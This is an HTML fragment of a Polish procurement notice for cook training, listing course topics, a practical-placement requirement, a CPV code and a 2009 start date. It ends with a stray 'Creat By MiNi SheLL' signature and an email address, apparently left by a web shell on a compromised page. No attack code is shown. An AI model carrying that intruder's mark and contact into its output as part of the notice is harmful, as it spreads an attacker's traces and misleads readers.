       -Sporządzanie potraw z wykorzystaniem warzyw i owoców,
       -sporządzanie potraw z wykorzystaniem mięs,
       -galarety dekoracyjne,
       -sporządzanie zup i sosów,
       -sporządzanie potraw z jaj,
       -sporządzanie wyrobów cukierniczych i deserów,
       -sporządzanie zakąsek ,
       -napoje,
       -kuchnia staropolska i regionalne potrawy.
5. Nowe trendy w gastronomii	
     1. Wykorzystanie ziół w sztuce kulinarnej.
     2. Zastosowanie ryb i owoców morza.
     3. Techniki flambirowania potraw.
     4. Sztuka carvingu.
6. Dekorowanie potraw i stołu.	
     1. Estetyka podawania potraw.
     2. Zasady i sposoby  dekoracji potraw i ciast.
     3. Sztuka dekoracji stołu.
     4. Zasady podawania do stołu.
7. Organizacja Przyjęć	
    1. Funkcje stołów bankietowych.
    2. Trendy w zakresie receptur potraw i prezentacji potraw.
    3. Garnirowane patery.
    4. Ekspozycje i aranżacje wyrobów na stołach bankietowych i okolicznościowych.
Egzamin końcowy
10. Program szkolenia musi być sporządzony ze szczególnym uwzględnieniem zajęć praktycznych tj. by uczestnicy szkolenia odbyli część zajęć praktycznych w jednostkach żywienia zbiorowego, gdzie będą mieli możliwość poznania charakteru i specyfiki pracy kucharza i zdobycia umiejętności praktycznych niezbędnych w ww. zawodzie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2009.</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com